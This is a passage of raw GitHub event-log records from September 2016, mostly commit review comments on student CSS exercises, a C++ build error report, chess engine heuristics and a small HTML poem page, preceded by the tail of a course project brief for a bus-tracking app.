essay (PDF, 2 pages max) describing the following:\r\nIntended use of the system: who and how will use the system. (4 pts)\r\nIts overall functionality: what will the system do, how will the system help its users accomplish their tasks. (3 pts)\r\nMain components of the system: break down the system into logical or architectural components and provide the rationale for this breakdown. (3 pts)\r\n\r\n\r\nHere’s a brief project description I would like your team to work on. We can discuss it in more details on Wednesday.\r\n\r\nCTFastrak application\r\nReal-time information about vehicle locations, arrival/departure predictions and service alerts is available for CTfastrak services. This information is provided via real-time data feeds in GTFS-realtime and JSON formats. Route structure and schedule data for CTfastrak services is also available in GTFS format. More info is available at https://www.cttransit.com/about/developers \r\nObjective: build a map-based website or a mobile app that would display CTFastrak route map along with all bus stops. All buses will be identified on the map. All stops will have information about the next few approaching buses. Given the user’s destination and the current location on the map, the system will be able to provide a recommendation for the nearest bust stop offering the fastest arrival to the destination. \r\n\r\n"}},"created_at":"2016-09-17T21:34:16Z"}
{"id":"4578704223","type":"CommitCommentEvent","actor":{"login":"plumpudding"},"repo":{"name":"eulenfunk/fastd-peers"},"payload":{"comment":{"id":19067363,"position":4,"line":2,"path":"nefmet/met0","commit_id":"b7378a0d9f5d3eef79e62deaa58991c217bb4975","created_at":"2016-09-17T21:34:27Z","updated_at":"2016-09-17T21:34:27Z","body":"das ist aber in der site.conf, nicht direkt in der fastd config"}},"created_at":"2016-09-17T21:34:27Z"}
{"id":"4578705212","type":"CommitCommentEvent","actor":{"login":"zeaga"},"repo":{"name":"0tt/maestro"},"payload":{"comment":{"id":19067367,"position":null,"line":null,"path":null,"commit_id":"523ae964c179a9745cb95a459ac31690c4a84f8e","created_at":"2016-09-17T21:35:03Z","updated_at":"2016-09-17T21:35:03Z","body":"https://www.youtube.com/watch?v=KpcmfjFN8OI"}},"created_at":"2016-09-17T21:35:03Z"}
{"id":"4578706843","type":"CommitCommentEvent","actor":{"login":"Moorviper"},"repo":{"name":"eulenfunk/fastd-peers"},"payload":{"comment":{"id":19067372,"position":4,"line":2,"path":"nefmet/met0","commit_id":"b7378a0d9f5d3eef79e62deaa58991c217bb4975","created_at":"2016-09-17T21:35:59Z","updated_at":"2016-09-17T21:35:59Z","body":"ja ich müsste mal auf einen router schauen wie es dann in der fastd config aussieht.\r\n"}},"created_at":"2016-09-17T21:35:59Z"}
{"id":"4578707230","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19067373,"position":54,"line":54,"path":"00-HTML-CSS-basics/Ejercicio 2.3/Styles/styles.css","commit_id":"ccee24048ee9ab1baadc640b4957d464d5e35e91","created_at":"2016-09-17T21:36:11Z","updated_at":"2016-09-17T21:36:11Z","body":"It is working for the header class but you can not see it painted blue because the header's child `<h1 class=\"header__title\">This is the Header</h1>` has a class that doesn't end in **r**, so it is still painted magenta. Try to remove that class from `<h1>` and you will see the blue color."}},"created_at":"2016-09-17T21:36:11Z"}
{"id":"4578712434","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19067391,"position":3,"line":3,"path":"00-HTML-CSS-basics/Ejercicio 2.5/Styles/styles.css","commit_id":"37151a4a642bb995e39b9c93b42d8418f3ed8115","created_at":"2016-09-17T21:39:33Z","updated_at":"2016-09-17T21:39:33Z","body":"add space after `:`"}},"created_at":"2016-09-17T21:39:33Z"}
{"id":"4578712741","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19067392,"position":null,"line":null,"path":null,"commit_id":"eba61013574bff36f03f791ec4e1b4fdadce43d5","created_at":"2016-09-17T21:39:45Z","updated_at":"2016-09-17T21:39:45Z","body":"@arnaud-morvan I'd say yes, unless they break the Travis tests"}},"created_at":"2016-09-17T21:39:45Z"}
{"id":"4578712910","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19067394,"position":7,"line":7,"path":"00-HTML-CSS-basics/Ejercicio 2.5/Styles/styles.css","commit_id":"37151a4a642bb995e39b9c93b42d8418f3ed8115","created_at":"2016-09-17T21:39:52Z","updated_at":"2016-09-17T21:39:52Z","body":"Try to avoid tag selectors."}},"created_at":"2016-09-17T21:39:52Z"}
{"id":"4578714029","type":"CommitCommentEvent","actor":{"login":"asottile"},"repo":{"name":"asottile/rubyvenv"},"payload":{"comment":{"id":19067397,"position":4,"line":4,"path":"setup.py","commit_id":"fc136905f4e4bb499dcc577487593a4a761053a5","created_at":"2016-09-17T21:40:34Z","updated_at":"2016-09-17T21:40:34Z","body":"LMAO"}},"created_at":"2016-09-17T21:40:34Z"}
{"id":"4578715412","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19067403,"position":12,"line":12,"path":"00-HTML-CSS-basics/Ejercicio 2.5/Styles/styles.css","commit_id":"37151a4a642bb995e39b9c93b42d8418f3ed8115","created_at":"2016-09-17T21:41:33Z","updated_at":"2016-09-17T21:41:33Z","body":"Review the alphaorder of the entire file taking into account that properies inside each rule should be alphaordered."}},"created_at":"2016-09-17T21:41:33Z"}
{"id":"4578715758","type":"CommitCommentEvent","actor":{"login":"Nedelosk"},"repo":{"name":"ForestryMC/ForestryMC"},"payload":{"comment":{"id":19067404,"position":6,"line":117,"path":"src/main/java/forestry/factory/tiles/TileCentrifuge.java","commit_id":"253e9f18edc3c09854fc98c348ac6855aba9f7d8","created_at":"2016-09-17T21:41:47Z","updated_at":"2016-09-17T21:41:47Z","body":"Fixed: 2e2fa8e6dffe9c7764bb82c64b9dec5cd2430632"}},"created_at":"2016-09-17T21:41:47Z"}
{"id":"4578716581","type":"CommitCommentEvent","actor":{"login":"TheDoct0r11"},"repo":{"name":"sant0ro/Yupi"},"payload":{"comment":{"id":19067405,"position":8,"line":84,"path":"Yupi.Controller/AchievementManager.cs","commit_id":"19529adec8b968e70ae310b66f78da81e1bbf997","created_at":"2016-09-17T21:42:20Z","updated_at":"2016-09-17T21:42:20Z","body":"They are coded partially."}},"created_at":"2016-09-17T21:42:20Z"}
{"id":"4578716995","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19067407,"position":21,"line":21,"path":"00-HTML-CSS-basics/Ejercicio 2.5/Styles/styles.css","commit_id":"37151a4a642bb995e39b9c93b42d8418f3ed8115","created_at":"2016-09-17T21:42:38Z","updated_at":"2016-09-17T21:42:38Z","body":"add space after `,` "}},"created_at":"2016-09-17T21:42:38Z"}
{"id":"4578718934","type":"CommitCommentEvent","actor":{"login":"sant0ro"},"repo":{"name":"sant0ro/Yupi"},"payload":{"comment":{"id":19067414,"position":8,"line":84,"path":"Yupi.Controller/AchievementManager.cs","commit_id":"19529adec8b968e70ae310b66f78da81e1bbf997","created_at":"2016-09-17T21:44:01Z","updated_at":"2016-09-17T21:44:01Z","body":"Nice, update the Subscriptions Issue (#140) with the progress."}},"created_at":"2016-09-17T21:44:01Z"}
{"id":"4578719297","type":"CommitCommentEvent","actor":{"login":"raphamorim"},"repo":{"name":"raphamorim/origamijs.com"},"payload":{"comment":{"id":19067416,"position":null,"line":null,"path":null,"commit_id":"437032fffabd7888bc1399b2a48ae715efa8bb20","created_at":"2016-09-17T21:44:20Z","updated_at":"2016-09-17T21:44:20Z","body":"👎 "}},"created_at":"2016-09-17T21:44:20Z"}
{"id":"4578720308","type":"CommitCommentEvent","actor":{"login":"tanji"},"repo":{"name":"tanji/replication-manager"},"payload":{"comment":{"id":19067419,"position":null,"line":null,"path":null,"commit_id":"11de15bfd46bd320ebe308da7ee4faa9955d8b31","created_at":"2016-09-17T21:45:08Z","updated_at":"2016-09-17T21:45:08Z","body":"@svaroqui there is no build.sh in the repo, please commit it!"}},"created_at":"2016-09-17T21:45:08Z"}
{"id":"4578721136","type":"CommitCommentEvent","actor":{"login":"esbrandt"},"repo":{"name":"mixxxdj/mixxx"},"payload":{"comment":{"id":19067421,"position":null,"line":null,"path":null,"commit_id":"bac0ff9fd4138dd89d623935f3b3e36c22226bd4","created_at":"2016-09-17T21:45:45Z","updated_at":"2016-09-17T21:45:45Z","body":"This commit breaks the build on OSX 10.11.6, any hints?\r\n\r\n```bash\r\n$clang --version\r\nApple LLVM version 6.1.0 (clang-602.0.49) (based on LLVM 3.6.0svn)\r\nTarget: x86_64-apple-darwin15.6.0\r\nThread model: posix\r\n```\r\n...\r\n```c++\r\nsrc/track/keyutils.cpp:92:57: error: no matching constructor for initialization of 'const QList<mixxx::track::io::key::ChromaticKey>'\r\nstatic const QList<mixxx::track::io::key::ChromaticKey> s_sortKeysCircleOfFifths {\r\n                                                        ^                        ~\r\n/Library/Frameworks/QtCore.framework/Headers/qlist.h:122:12: note: candidate constructor not viable: requires single argument 'l', but 25 arguments were provided\r\n    inline QList(const QList<T> &l) : d(l.d) { d->ref.ref(); if (!d->sharable) detach_helper(); }\r\n           ^\r\n/Library/Frameworks/QtCore.framework/Headers/qlist.h:121:12: note: candidate constructor not viable: requires 0 arguments, but 25 were provided\r\n    inline QList() : d(&QListData::shared_null) { d->ref.ref(); }\r\n           ^\r\nsrc/track/keyutils.cpp:132:57: error: no matching constructor for initialization of 'const QList<mixxx::track::io::key::ChromaticKey>'\r\nstatic const QList<mixxx::track::io::key::ChromaticKey> s_sortKeysCircleOfFifthsLancelot {\r\n                                                        ^                                ~\r\n/Library/Frameworks/QtCore.framework/Headers/qlist.h:122:12: note: candidate constructor not viable: requires single argument 'l', but 25 arguments were provided\r\n    inline QList(const QList<T> &l) : d(l.d) { d->ref.ref(); if (!d->sharable) detach_helper(); }\r\n           ^\r\n/Library/Frameworks/QtCore.framework/Headers/qlist.h:121:12: note: candidate constructor not viable: requires 0 arguments, but 25 were provided\r\n    inline QList() : d(&QListData::shared_null) { d->ref.ref(); }\r\n           ^\r\n10 warnings and 2 errors generated.\r\nscons: *** [osx64_build/track/keyutils.o] Error 1\r\nscons: building terminated because of errors.\r\n```"}},"created_at":"2016-09-17T21:45:45Z"}
{"id":"4578722358","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19067425,"position":69,"line":69,"path":"00-HTML-CSS-basics/Ejercicio 2.5.2/Styles/styles.css","commit_id":"b23d4f7ac574dcc4d535639184a8c3775040e5dc","created_at":"2016-09-17T21:46:40Z","updated_at":"2016-09-17T21:46:40Z","body":"Remove all the extra lines."}},"created_at":"2016-09-17T21:46:40Z"}
{"id":"4578722455","type":"CommitCommentEvent","actor":{"login":"PimpoHaze"},"repo":{"name":"juanvaldivia/cursogithub"},"payload":{"comment":{"id":19067426,"position":null,"line":null,"path":null,"commit_id":"a74d6b27e0db6d069ebbc6618df48be0839b1e04","created_at":"2016-09-17T21:46:45Z","updated_at":"2016-09-17T21:46:45Z","body":"delete"}},"created_at":"2016-09-17T21:46:45Z"}
{"id":"4578722577","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19067428,"position":64,"line":64,"path":"00-HTML-CSS-basics/Ejercicio 2.5.2/Styles/styles.css","commit_id":"b23d4f7ac574dcc4d535639184a8c3775040e5dc","created_at":"2016-09-17T21:46:52Z","updated_at":"2016-09-17T21:46:52Z","body":"indentation"}},"created_at":"2016-09-17T21:46:52Z"}
{"id":"4578724052","type":"CommitCommentEvent","actor":{"login":"oren"},"repo":{"name":"oren/pokemon"},"payload":{"comment":{"id":19067432,"position":null,"line":null,"path":null,"commit_id":"8dc9c90bad2aa8e1103e1b1a36398f2eff3b3d79","created_at":"2016-09-17T21:47:59Z","updated_at":"2016-09-17T21:47:59Z","body":"awesome feedback. is there a way to merge it?"}},"created_at":"2016-09-17T21:47:59Z"}
{"id":"4578724660","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19067434,"position":52,"line":669,"path":"about.php","commit_id":"2cd04e3e47e528c6556649326799f814ed63aaca","created_at":"2016-09-17T21:48:25Z","updated_at":"2016-09-17T21:48:25Z","body":"This line was deleted"}},"created_at":"2016-09-17T21:48:25Z"}
{"id":"4578726039","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19067437,"position":48,"line":48,"path":"00-HTML-CSS-basics/Ejercicio 2.5.2/Styles/styles.css","commit_id":"b23d4f7ac574dcc4d535639184a8c3775040e5dc","created_at":"2016-09-17T21:49:31Z","updated_at":"2016-09-17T21:49:31Z","body":"Changing the alpha should be the same as changing the opacity, if the element hasn't children."}},"created_at":"2016-09-17T21:49:31Z"}
{"id":"4578726669","type":"CommitCommentEvent","actor":{"login":"woodruffw"},"repo":{"name":"fdcabb611f5e10605d933575bcac24c9/Jeonhwa"},"payload":{"comment":{"id":19067440,"position":null,"line":null,"path":null,"commit_id":"cd3f098c5b73fbe0f3cd1ffbad2493f8d4deec67","created_at":"2016-09-17T21:49:56Z","updated_at":"2016-09-17T21:49:56Z","body":"???????"}},"created_at":"2016-09-17T21:49:56Z"}
{"id":"4578728952","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19067446,"position":23,"line":23,"path":"00-HTML-CSS-basics/Ejercicio 2.5.2/index.html","commit_id":"b23d4f7ac574dcc4d535639184a8c3775040e5dc","created_at":"2016-09-17T21:51:39Z","updated_at":"2016-09-17T21:51:39Z","body":"Try to avoid using a tag name as a class name. It can be confusing."}},"created_at":"2016-09-17T21:51:39Z"}
{"id":"4578730125","type":"CommitCommentEvent","actor":{"login":"fititnt"},"repo":{"name":"webiwg/acessibilidade-web-pt"},"payload":{"comment":{"id":19067447,"position":null,"line":null,"path":null,"commit_id":"8345da93ce69633a94e1fb29d807c024bbe4504c","created_at":"2016-09-17T21:52:34Z","updated_at":"2016-09-17T21:52:34Z","body":"Errei a referencia; Este é sobre o #12 "}},"created_at":"2016-09-17T21:52:34Z"}
{"id":"4578731000","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19067450,"position":14,"line":14,"path":"00-HTML-CSS-basics/Ejercicio 2.5.2/Styles/styles.css","commit_id":"b23d4f7ac574dcc4d535639184a8c3775040e5dc","created_at":"2016-09-17T21:53:11Z","updated_at":"2016-09-17T21:53:11Z","body":"this can be `margin: 20px 0 20px 20px;`"}},"created_at":"2016-09-17T21:53:11Z"}
{"id":"4578731899","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19067454,"position":1,"line":1,"path":"00-HTML-CSS-basics/Ejercicio 2.5.2/Styles/styles.css","commit_id":"b23d4f7ac574dcc4d535639184a8c3775040e5dc","created_at":"2016-09-17T21:53:49Z","updated_at":"2016-09-17T21:53:49Z","body":"Review and update alphaorder."}},"created_at":"2016-09-17T21:53:49Z"}
{"id":"4578731911","type":"CommitCommentEvent","actor":{"login":"Mindbreaker1"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":19067455,"position":null,"line":null,"path":null,"commit_id":"0079074f9147f3b39cf544ad594ba60cb734e1c2","created_at":"2016-09-17T21:53:49Z","updated_at":"2016-09-17T21:53:49Z","body":"Stockfish usually knows when to do this.  The exception is in closed games.  When and if it opens, you want your pieces coordinated.  That means bishops on adjacent diagonals and able to move into the center together when the opportunity presents, rooks/queen in battery and quickly able to move to other battery for formations, and knights where they can quickly move with the queen toward the opponent's king or often one stays near the king in a protective role.\r\n\r\nIf the position is already open, Stockfish can just calculate where things should be.  If it opens, and Stockfish is caught flat-footed then opportunities are lost. \r\n\r\nAlso, if it looks like you can open it, you want to position your pieces so they can flood through where it opens rather than rushing the break.\r\n\r\nIt would be interesting to see how this would do if the bonus was limited to closed positions.  There is more reason to have them together in open games but there are many exceptions and you don't want to interfere in those with a general rule.  Same is true in closed positions, but Stockfish is clueless there because of horizon and the apparent near equality of choices and any good rule of thumb would be beneficial, I suspect."}},"created_at":"2016-09-17T21:53:49Z"}
{"id":"4578733326","type":"CommitCommentEvent","actor":{"login":"1123asd111"},"repo":{"name":"1123asd111/-.com"},"payload":{"comment":{"id":19067460,"position":1,"line":1,"path":"README.md","commit_id":"0bbcd4595cdf4450f0be7b79d62e1d764eb14fa9","created_at":"2016-09-17T21:54:53Z","updated_at":"2016-09-17T21:54:53Z","body":"<!DOCTYPE html\r\n  <html>\r\n      <head>\r\n          <meta http-equiv=\"Content-Tupe\" content=\"text/html:charset=utf-8\" />\r\n\t\t  <title>Главная страница кек</title>\r\n\t</head>\r\n\t<body>\r\n         <center><h1>Русские стихи!  Пушкин А.С.</h1></center>\r\n\t    <h2>У лукоморья дуб зелёный</h2>\r\n<ol> <p><b>@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@</b><p>\r\n <li><p><b>У лукоморья дуб зелёный;</b><p></li>\r\n <li><p><b>Златая цепь на дубе том:</b><p></li>\r\n <li><p><b>И днём и ночью кот учёный</b><p></li>\r\n <li><p><b>Всё ходит по цепи кругом;</b><p></li>\r\n <p><b>@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@</b><p>          \r\n <li><p><b>Идёт направо – песнь заводит,</b><p></li>\r\n <li><p><b>Налево – сказку говорит.</b><p></li>\r\n <li><p><b>Там чудеса: там леший бродит,</b><p></li>\r\n <li><p><b>Русалка на ветвях сидит;</b><p></li>\r\n <p><b>@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@</b><p>\r\n <li><p><b>Там на неведомых дорожках</b><p></li>\r\n <li><p><b>Следы невиданных зверей;</b><p></li>\r\n <li><p><b>Избушка там на курьих ножках</b><p></li>\r\n <li><p><b>Стоит без окон, без дверей;</b><p></li>\r\n <p><b>@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@</b><p>\r\n <li><p><b>Там лес и дол видений полны;</b><p></li>\r\n <li><p><b>Там о заре прихлынут волны</b><p></li>\r\n <li><p><b>На брег песчаный и пустой,</b><p></li>\r\n <li><p><b>И тридцать витязей прекрасных</b><p></li>\r\n <li><p><b>Чредой из вод выходят ясных,</b><p></li>\r\n <li><p><b>И с ними дядька их морской;</b><p></li>\r\n <p><b>@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@</b><p>\r\n <li><p><b>Там королевич мимоходом</b><p></li>\r\n <li><p><b>Пленяет грозного царя;</b><p></li>\r\n <li><p><b>Там в облаках перед народом</b><p></li>\r\n <li><p><b>Через леса, через моря</b><p></li>\r\n <li><p><b>Колдун несёт богатыря;</b><p></li>\r\n <p><b>@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@</b><p>\r\n <li><p><b>В темнице там царевна тужит,</b><p></li>\r\n <li><p><b>А бурый волк ей верно служит;</b><p></li>\r\n <li><p><b>Там ступа с Бабою Ягой</b><p></li>\r\n <li><p><b>Идёт, бредёт сама собой,</b><p></li>\r\n <li><p><b>Там царь Кащей над златом чахнет;</b><p></li>\r\n <p><b>@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@</b><p>\r\n <li><p><b>Там русский дух… там Русью пахнет!</b><p></li>\r\n <li><p><b>И там я был, и мёд я пил;</b><p></li>\r\n <li><p><b>У моря видел дуб зелёный;</b><p></li>\r\n <li><p><b>Под ним сидел, и кот учёный</b><p></li>\r\n <li><p><b>Свои мне сказки говорил.</b><p></li>\r\n</ol> <p><b>@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@</b><p>\r\n         <h2>Пушкин А.С.</h2>\r\n\t\t <p>\r\n\t\t \r\n\t\t <a href=\"page-2.html\">2стр</a>\r\n\t</body>\r\n</html>"}},"created_at":"2016-09-17T21:54:53Z"}
{"id":"4578735154","type":"CommitCommentEvent","actor":{"login":"lieff"},"repo":{"name":"elfmz/far2l"},"payload":{"comment":{"id":19067463,"position":null,"line":null,"path":null,"commit_id":"11b16ec03fb555482d76a63c2885d94a611ff18e","created_at":"2016-09-17T21:56:19Z","updated_at":"2016-09-17T21:56:19Z","body":"А custom протестировать, ну там видимо в настройках плагина надо добавить какойнить кастомный архиватор и попробовтаь его заюзать."}},"created_at":"2016-09-17T21:56:19Z"}
{"id":"4578736335","type":"CommitCommentEvent","actor":{"login":"arrowrowe"},"repo":{"name":"miloyip/json-tutorial"},"payload":{"comment":{"id":19067470,"position":72,"line":354,"path":"tutorial01/tutorial01.md","commit_id":"50d8a6b7c7ea663180a7268555a9b7edc1326f88","created_at":"2016-09-17T21:57:10Z","updated_at":"2016-09-17T21:57:10Z","body":"Maybe `lept_parse_whitespace(&c);`?"}},"created_at":"2016-09-17T21:57:10Z"}
{"id":"4578739290","type":"CommitCommentEvent","actor":{"login":"bluegr"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":19067479,"position":16,"line":90,"path":"engines/xeen/debugger.cpp","commit_id":"ad9e00d213115971ad298b8394eeb6f2fe7349e6","created_at":"2016-09-17T21:59:25Z","updated_at":"2016-09-17T21:59:25Z","body":"Typo: \"dump\", not \"spell\" (or you could just use argv[0])"}},"created_at":"2016-09-17T21:59:25Z"}
{"id":"4578740271","type":"CommitCommentEvent","actor":{"login":"JeffBship"},"repo":{"name":"JeffBship/CS530-16-Harhay-Blankenship-Somma"},"payload":{"comment":{"id":19067482,"position":null,"line":null,"path":null,"commit_id":"ad54bb939c2261cc19f8f93e9a8ae47d7d29c16b","created_at":"2016-09-17T22:00:07Z","updated_at":"2016-09-17T22:00:07Z","body":"GitHub is hard to figure out."}},"created_at":"2016-09-17T22:00:07Z"}
{"id":"4578741741","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19067486,"position":11,"line":11,"path":"00-HTML-CSS-basics/Ejercicio 2.6/index.html","commit_id":"387334ad44ed7584116818e2df8d879a428bd993","created_at":"2016-09-17T22:00:52Z","updated_at":"2016-09-17T22:00:52Z","body":"Unless the changes be too significative, I prefer to use just one css file. You can add a `@media` section in there with the styles that should be overwritten."}},"created_at":"2016-09-17T22:00:52Z"}
{"id":"4578743046","type":"CommitCommentEvent","actor":{"login":"MOVZX"},"repo":{"name":"guts94/kenzo"},"payload":{"comment":{"id":19067495,"position":null,"line":null,"path":null,"commit_id":"6ffbe286ae357af6bac2854e30a74d7ccb2d2b48","created_at":"2016-09-17T22:01:55Z","updated_at":"2016-09-17T22:01:55Z","body":"Sorry mate for being rude, I'll explain it here:\r\nhttps://github.com/MOVZX/Kenzo/commit/ab1725b1af1c62480d60e556e315eb7ec6a252f7"}},"created_at":"2016-09-17T22:01:55Z"}
{"id":"4578745027","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19067502,"position":6,"line":6,"path":"00-HTML-CSS-basics/index_2.html","commit_id":"d36d3b94edab5acf9ec62bd63bdf6cfae502596a","created_at":"2016-09-17T22:02:44Z","updated_at":"2016-09-17T22:02:44Z","body":"missing title"}},"created_at":"2016-09-17T22:02:44Z"}
{"id":"4578745075","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"ArmLil/mediaplayer"},"payload":{"comment":{"id":19067503,"position":4,"line":4,"path":"src/am/aca/ll/mediaPlayer/controller/Main.java","commit_id":"e938edfb9abfe3b680a6ee41aed111951f05da09","created_at":"2016-09-17T22:02:46Z","updated_at":"2016-09-17T22:02:46Z","body":"Main class @ lav klini vor controller package i mej chlini\r\nhenc lini root package i mej orinak\r\npackage am.aca.ll.mediaPlayer;\r\n"}},"created_at":"2016-09-17T22:02:46Z"}
{"id":"4578746317","type":"CommitCommentEvent","actor":{"login":"Dandandans"},"repo":{"name":"adobe/brackets"},"payload":{"comment":{"id":19067511,"position":null,"line":null,"path":null,"commit_id":"2286cd1db260fcfb130435161416a55b007472a9","created_at":"2016-09-17T22:03:43Z","updated_at":"2016-09-17T22:03:43Z","body":"Missing comma between `\"on\"` and `\"organization\"` fixed in commit https://github.com/adobe/brackets/pull/12721/commits/16d7eda192a41331666c744b973f6a4da75512ac."}},"created_at":"2016-09-17T22:03:43Z"}
{"id":"4578747999","type":"CommitCommentEvent","actor":{"login":"saverbot"},"repo":{"name":"saverbot/hello-world"},"payload":{"comment":{"id":19067518,"position":2,"line":2,"path":"README.md","commit_id":"980eb2f7de33218e485818f289d9026cc3b2a66c","created_at":"2016-09-17T22:05:01Z","updated_at":"2016-09-17T22:05:01Z","body":"i actually can't tell what's going on"}},"created_at":"2016-09-17T22:05:01Z"}
{"id":"4578748024","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"ArmLil/mediaplayer"},"payload":{"comment":{"id":19067519,"position":24,"line":24,"path":"src/am/aca/ll/mediaPlayer/controller/MediaController.java","commit_id":"e938edfb9abfe3b680a6ee41aed111951f05da09","created_at":"2016-09-17T22:05:02Z","updated_at":"2016-09-17T22:05:02Z","body":"Singletonneri referencner@ petq chi static pahel\r\norinak \r\nstatic UserRepositoryImpl usersRepo = UserRepositoryImpl.getInstance(); \r\ntogh lini\r\nUserRepositoryImpl usersRepo = UserRepositoryImpl.getInstance(); \r\nvor static enq pahum \"lazy load\" @ arten veranuma. Henc application@ start anes arten iranc objectner@ ksarqi. Bayc qez petqa en jamanak sarqi erp arajin angam dimum es."}},"created_at":"2016-09-17T22:05:02Z"}
{"id":"4578748567","type":"CommitCommentEvent","actor":{"login":"merik444"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19067521,"position":null,"line":null,"path":null,"commit_id":"6f8a5719f9bb721d9eebf40ff4c596835988875f","created_at":"2016-09-17T22:05:26Z","updated_at":"2016-09-17T22:05:26Z","body":"Tested extensively on my Dev center. Everything works just as it should. Went as far as making a new toon and using various materials of various qualities just to make sure"}},"created_at":"2016-09-17T22:05:26Z"}
{"id":"4578748683","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19067523,"position":59,"line":57,"path":"00-HTML-CSS-basics/assets/style.css","commit_id":"eb816d81570e8c0e571febf9bc29f2bf38f7d6b8","created_at":"2016-09-17T22:05:31Z","updated_at":"2016-09-17T22:05:31Z","body":"remove extra space between `[class*=\"a\"]` and `:not([class$=\"r\"])`"}},"created_at":"2016-09-17T22:05:31Z"}
{"id":"4578750436","type":"CommitCommentEvent","actor":{"login":"hovhanneskhalatyan"},"repo":{"name":"ArmLil/mediaplayer"},"payload":{"comment":{"id":19067527,"position":61,"line":61,"path":"src/am/aca/ll/mediaPlayer/controller/MediaController.java","commit_id":"e938edfb9abfe3b680a6ee41aed111951f05da09","created_at":"2016-09-17T22:06:55Z","updated_at":"2016-09-17T22:06:55Z","body":"co mot controller@ verjin layerna. Et depqum lav klini vor verjin layert exceptionner chqci.\r\nVor cragir oktagorcogh@ User@ exeptioner tesnelu tegh@ iran haskanali lezvov message tesni."}},"created_at":"2016-09-17T22:06:55Z"}
{"id":"4578751807","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19067535,"position":17,"line":15,"path":"00-HTML-CSS-basics/assets/style.css","commit_id":"eb816d81570e8c0e571febf9bc29f2bf38f7d6b8","created_at":"2016-09-17T22:07:58Z","updated_at":"2016-09-17T22:07:58Z","body":"Check indentation and alphaorder inside each rule."}},"created_at":"2016-09-17T22:07:58Z"}
{"id":"4578752061","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19067537,"position":23,"line":21,"path":"00-HTML-CSS-basics/assets/style.css","commit_id":"eb816d81570e8c0e571febf9bc29f2bf38f7d6b8","created_at":"2016-09-17T22:08:12Z","updated_at":"2016-09-17T22:08:12Z","body":"???"}},"created_at":"2016-09-17T22:08:12Z"}
{"id":"4578752604","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Guilleves/startup"},"payload":{"comment":{"id":19067542,"position":28,"line":26,"path":"00-HTML-CSS-basics/assets/style.css","commit_id":"eb816d81570e8c0e571febf9bc29f2bf38f7d6b8","created_at":"2016-09-17T22:08:37Z","updated_at":"2016-09-17T22:08:37Z","body":"add space after `:`"}},"created_at":"2016-09-17T22:08:37Z"}
{"id":"4578754083","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":19067547,"position":null,"line":null,"path":null,"commit_id":"6503be51d6b1094086c2d7f623d256da66bec141","created_at":"2016-09-17T22:09:42Z","updated_at":"2016-09-17T22:09:42Z","body":"@valib I agree with @alfaproject that it looks wrong, but I haven't studied the code in a larger context. That obviously goes for all the comparators for width and height in that block."}},"created_at":"2016-09-17T22:09:42Z"}
